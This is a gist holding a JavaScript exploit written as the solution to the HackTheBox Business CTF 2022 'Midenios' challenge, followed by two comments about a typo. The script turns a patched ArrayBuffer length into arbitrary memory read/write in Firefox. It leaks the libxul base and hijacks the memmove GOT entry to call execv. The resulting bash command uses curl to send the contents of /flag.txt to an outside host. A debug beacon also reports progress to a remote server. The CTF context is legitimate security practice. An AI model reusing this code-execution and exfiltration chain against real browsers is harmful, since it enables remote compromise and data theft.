2022 HackTheBox Business CTF Midenios
  • My first Firefox JS exploit
  • Not the intended way, but I was fast (first blood)
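/**
 * Render the first `s` bytes of `b` as two-digit hex, 16 bytes per line.
 *
 * Fix: `i` and `r` were undeclared and therefore leaked as globals (and
 * would be a ReferenceError under strict mode); they are block-scoped now.
 *
 * @param {ArrayLike<number>} b - byte source (e.g. a Uint8Array); each element is formatted with toString(16)
 * @param {number} s - number of bytes to dump, starting at index 0
 * @returns {string} hex text; every 16th byte is followed by '\n', all others by ' '
 * @throws {TypeError} if `s` exceeds `b.length` (an undefined element has no toString)
 */
function hexdump(b, s) {
  let out = '';
  for (let i = 0; i < s; i += 1) {
    const byte = b[i].toString(16).padStart(2, '0');
    // Line break after every 16th byte (1-based count), a space otherwise.
    out += byte + ((i + 1) % 0x10 === 0 ? '\n' : ' ');
  }
  return out;
}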
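/**
 * Render `s` bytes of `b`, starting at offset `o`, as little-endian 64-bit
 * words, two words per line.
 *
 * Each 8-byte group is printed most-significant byte first (b[i+7] … b[i+0])
 * so that a word reads as an ordinary hex number. Words alternate between a
 * trailing ' ' and a trailing '\n'.
 *
 * Fix: `i`, `c` and `r` were undeclared globals; they are local now.
 *
 * @param {ArrayLike<number>} b - byte source
 * @param {number} o - start offset
 * @param {number} s - byte count; a partial trailing group still reads all 8 bytes
 * @returns {string} formatted text
 * @throws {TypeError} if a read lands outside `b` (undefined has no toString)
 */
function hexdump64(b, o, s) {
  const end = s + o;
  let out = '';
  let wordsOnLine = 0;
  for (let i = o; i < end; i += 8) {
    for (let k = 7; k >= 0; k -= 1) {
      out += b[i + k].toString(16).padStart(2, '0');
    }
    if (wordsOnLine !== 1) {
      out += ' ';
      wordsOnLine += 1;
    } else {
      out += '\n';
      wordsOnLine = 0;
    }
  }
  return out;
}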
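/**
 * Read an unsigned little-endian 32-bit integer from `a` at byte offset `o`.
 *
 * Fix: `r` was an undeclared global and the original returned the result of
 * an assignment expression (`r >>>= 0`); this version is side-effect free.
 *
 * @param {ArrayLike<number>} a - byte source; elements are expected to be 0..255
 * @param {number} o - byte offset of the least-significant byte
 * @returns {number} the value as an unsigned number in 0 .. 0xffffffff
 */
function relRead32(a, o) {
  const value = a[o] | (a[o + 1] << 8) | (a[o + 2] << 16) | (a[o + 3] << 24);
  // `<< 24` can set the sign bit; `>>> 0` reinterprets the result as unsigned.
  return value >>> 0;
}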
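/**
 * Read a little-endian 64-bit value from `a` at byte offset `o`.
 *
 * The value is returned in three forms because the rest of this file passes
 * 64-bit quantities around as separate 32-bit halves.
 *
 * Fix: `r_lo` and `r_hi` were undeclared globals; they are local now.
 *
 * @param {ArrayLike<number>} a - byte source
 * @param {number} o - byte offset of the least-significant byte
 * @returns {{hi: number, lo: number, int: bigint}} upper and lower 32 bits as
 *   unsigned numbers, plus the full value as a BigInt
 */
function relRead64(a, o) {
  const lo = relRead32(a, o);
  const hi = relRead32(a, o + 4);
  return { hi, lo, int: (BigInt(hi) << 32n) | BigInt(lo) };
}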
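/**
 * Store `v` into `a` at byte offset `o` as a little-endian 32-bit integer.
 *
 * Fix: the original used the arithmetic shift `>>` on the top byte, which
 * yields a negative number when bit 31 of `v` is set (it only appeared to
 * work because Uint8Array truncates on store); `>>>` plus a byte mask keeps
 * every stored value in 0..255 for any array type. The unused `r = 0`
 * (an undeclared global) is gone.
 *
 * @param {ArrayLike<number>} a - writable byte sink; elements o..o+3 are overwritten
 * @param {number} o - byte offset of the least-significant byte
 * @param {number} v - value; only its low 32 bits are stored
 */
function relWrite32(a, o, v) {
  a[o] = v & 0xff;
  a[o + 1] = (v >>> 8) & 0xff;
  a[o + 2] = (v >>> 16) & 0xff;
  a[o + 3] = (v >>> 24) & 0xff;
}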
/**
 * Store a 64-bit value given as two 32-bit halves, little-endian, at byte
 * offset `o`: the low half lands at o..o+3, the high half at o+4..o+7.
 *
 * @param {ArrayLike<number>} a - writable byte sink
 * @param {number} o - byte offset of the least-significant byte
 * @param {number} v_hi - upper 32 bits
 * @param {number} v_lo - lower 32 bits
 */
function relWrite64(a, o, v_hi, v_lo) {
  const halves = [
    [o, v_lo],
    [o + 4, v_hi],
  ];
  for (const [offset, half] of halves) {
    relWrite32(a, offset, half);
  }
}
// Set up the two aliased views the rest of this file depends on.
//
// `vulnByteArr` is a Uint8Array over an 8-byte ArrayBuffer whose byteLength
// has been reassigned to 0xffffffff; `targetByteArr` is an ordinary 8-byte
// Uint8Array. The loop then looks for the index inside `vulnByteArr` at which
// `targetByteArr`'s contents are visible: it writes a marker into the target,
// scans for it, changes the marker and re-reads to rule out a coincidental
// match. Every assignment without `var`/`let` here (vulnArrBuf, vulnByteArr,
// targetByteArr, found, l) creates or overwrites a global.
//
// Returns -1 when no aliasing index was found within the first 0x10000
// bytes, otherwise { vuln, target, offset } with `offset` being that index.
// An index of 0 would also be reported as "not found" because of `!found`.
function setup_arrays() {
vulnArrBuf = new ArrayBuffer(8);
// This assignment is the challenge-specific part: on a stock engine
// byteLength is a read-only accessor and, in sloppy mode, the write is
// silently ignored, so the view stays 8 bytes long, the reads below yield
// undefined (treated as 0) and the scan returns -1. The patched build that
// honours it is not shown in this file.
vulnArrBuf.byteLength = 0xffffffff;
vulnByteArr = new Uint8Array(vulnArrBuf);
// Tag the first dword of the oversized view with 0xcafebabe (little-endian).
vulnByteArr[0] = 0xbe
vulnByteArr[1] = 0xba
vulnByteArr[2] = 0xfe
vulnByteArr[3] = 0xca
targetByteArr = new Uint8Array(8);
// First marker, as (hi, lo): 0x13371337_0f000f00.
relWrite64(targetByteArr, 0, 0x13371337, 0x0f000f00);
var i = 0;
found = 0;
// Scan qword by qword; `l` is the { hi, lo, int } triple from relRead64.
while (i < 0x10000) {
l = relRead64(vulnByteArr, i)
if (l.lo == 0x0f000f00) {
// console.log("found 0x" + i.toString(16))
// Candidate hit: flip the marker through `targetByteArr` and check that
// the change shows up at the same index of `vulnByteArr`.
relWrite64(targetByteArr, 0, 0x13371337, 0x13371337)
l = relRead64(vulnByteArr, i)
if (l.lo != 0x13371337) {
// Coincidental match: restore the first marker and keep scanning.
relWrite64(targetByteArr, 0, 0x13371337, 0x0f000f00)
} else {
// Confirmed; the loop does not break, a later confirmed hit would win.
found = i
}
}
i += 8;
}
if (!found) {
// console.log("not found.");
return -1;
} else {
return { vuln: vulnByteArr, target: targetByteArr, offset: found }
}
}
/**
 * Debug beacon: when the global `logremoteon` is truthy, issue a synchronous
 * GET to `<remote>/hey.txt?<log>` and discard the response. `remote` is a
 * global set by the entry points below; `log` is appended to the query
 * string verbatim, without URL encoding.
 *
 * @param {string} log - message to append to the request URL
 */
function logremote(log) {
  if (!logremoteon) return;
  const req = new XMLHttpRequest();
  req.open('GET', `${remote}/hey.txt?${log}`, false);
  req.send(null);
}
// Exploit driver: obtains the aliased views from setup_arrays(), then uses
// `vulnByteArr` as a read/write primitive over nearby memory and
// `targetByteArr`'s data pointer (the qword at v2tOff-8) as a relocatable
// 8-byte window. All constants below (0x3110208, 0x0ce5b880, 0x0ce600c8 and
// the -6 on the execv address) are specific to the challenge's build and
// are not derived at runtime. Returns -1 when setup_arrays() never succeeds;
// otherwise undefined. Apart from `i`, every local here is an undeclared
// global. Network artefacts of a run are the optional beacon GETs issued by
// logremote() and the outbound curl request contained in `argv`.
function exploit() {
console.log("exploit start.");
var i = 0;
// setup_arrays() depends on where the target array happens to land, so it
// is retried up to 0x100 times.
while (i < 0x100) {
ret = setup_arrays();
if (ret != -1) {
break
}
i += 1;
}
if (i >= 0x100) {
console.log("not found.");
logremote("not found.")
return -1;
}
vulnByteArr = ret.vuln
targetByteArr = ret.target
// Index in vulnByteArr at which targetByteArr's data begins.
v2tOff = ret.offset
console.log(hexdump64(vulnByteArr, v2tOff-0x40, 0x100))
// leak base
// The qword 0x28 bytes before the target data is read as a pointer into
// libxul. The hi/lo arithmetic below carries no borrow, so it is only
// correct while `lo` stays >= 0x3110208.
leak = relRead64(vulnByteArr, v2tOff-0x28)
console.log(leak.int.toString(16))
xul_base = {'hi': leak.hi, 'lo': leak.lo - 0x3110208}
xul_memmove_got = {'hi': xul_base.hi, 'lo': xul_base.lo + 0x0ce5b880}
xul_execv_got = {'hi': xul_base.hi, 'lo': xul_base.lo + 0x0ce600c8}
// leak execv@libc
// Save targetByteArr's data pointer, point it at the execv GOT slot and read
// the slot's contents through targetByteArr. `targetByteArrOrig` is also
// what the recovery step at the end restores.
targetByteArrOrig = relRead64(vulnByteArr, v2tOff-8)
relWrite64(vulnByteArr, v2tOff-8, xul_execv_got.hi, xul_execv_got.lo)
libc_execv = relRead64(targetByteArr, 0)
console.log("execv@libc: " + libc_execv.int.toString(16))
logremote("hey")
// make payload
// l = relRead64(vulnByteArr, v2tOff-8)
// Absolute address of vulnByteArr's own data: the saved pointer minus the
// aliasing offset (same no-borrow caveat as above).
vulnByteArrStart = {'hi': targetByteArrOrig.hi, 'lo': targetByteArrOrig.lo - v2tOff}
argv = ["/bin/bash", "-c", "/usr/bin/curl \"http://d0now.cloud:31337/flag=$(/bin/cat /flag.txt)\""]
argv_addr = []
idx = 0
// Copy each argv string, NUL-terminated, into the start of vulnByteArr's
// data (overwriting the 0xcafebabe tag) and record its absolute address.
// `var i` reuses the function-scoped `i` from the retry loop above.
for (var i = 0; i < argv.length; i++) {
argv_addr.push(vulnByteArrStart.lo + idx)
for (var j = 0; j < argv[i].length; j++) {
vulnByteArr[idx + j] = argv[i].charCodeAt(j);
}
vulnByteArr[idx + argv[i].length] = 0;
idx += argv[i].length + 1
}
// cmdarr layout: "/bin/bash\0" at 0x00, the three argv pointers at
// 0x10/0x18/0x20 and a NULL terminator at 0x28.
cmdarr = new Uint8Array(100);
cmd = "/bin/bash";
for (var i = 0; i < cmd.length; i++) {
cmdarr[i] = cmd.charCodeAt(i);
}
cmdarr[cmd.length] = 0;
logremote("wow")
relWrite64(cmdarr, 0x10, vulnByteArrStart.hi, argv_addr[0])
relWrite64(cmdarr, 0x18, vulnByteArrStart.hi, argv_addr[1])
relWrite64(cmdarr, 0x20, vulnByteArrStart.hi, argv_addr[2])
relWrite64(cmdarr, 0x28, 0, 0)
// trigger
console.log("trigger...")
logremote("trigger")
// Point targetByteArr at the memmove GOT slot, save the slot's value and
// replace it with the execv address (the -6 adjustment is build-specific;
// its reason is not visible in this file). copyWithin(0, 0x10) then
// presumably reaches memmove with dst = cmdarr+0 and src = cmdarr+0x10.
// `targetByteArr_orig` is assigned but never read; the restore below uses
// `targetByteArrOrig`.
targetByteArr_orig = relRead64(vulnByteArr, v2tOff-8)
relWrite64(vulnByteArr, v2tOff-8, xul_memmove_got.hi, xul_memmove_got.lo)
memmove_orig = relRead64(targetByteArr, 0)
relWrite64(targetByteArr, 0, libc_execv.hi, libc_execv.lo - 6)
cmdarr.copyWithin(0, 0x10);
// recover
// Restore the GOT slot and targetByteArr's data pointer; only reached if
// the call above returns.
relWrite64(targetByteArr, 0, memmove_orig.hi, memmove_orig.lo)
relWrite64(vulnByteArr, v2tOff-8, targetByteArrOrig.hi, targetByteArrOrig.lo)
// log
console.log("done")
logremote("done")
}
/**
 * Local-debug entry point: enables the beacon (global `logremoteon`), points
 * it at a loopback listener (global `remote`, read by logremote()) and runs
 * exploit(). Its return value is discarded.
 */
function exploit_debug_1() {
  remote = 'http://127.0.0.1:1337';
  logremoteon = true;
  exploit();
}
/**
 * Entry point without the debug beacon: clears the global `logremoteon`
 * (so logremote() is a no-op) and runs exploit(), discarding its result.
 */
function exploit_real() {
  logremoteon = false;
  exploit();
}
@neomafo88

typographical error on https://gist.github.com/d0now/c0280a7246fd97edb71468d87d0b8e83#file-midenios_exploit-js-L208

`function_exploit_real()` → `function exploit_real()`

@d0now

d0now commented Aug 23, 2022

typographical error on https://gist.github.com/d0now/c0280a7246fd97edb71468d87d0b8e83#file-midenios_exploit-js-L208

function_exploit_real() function exploit_real()

@neomafo88 Thank you!
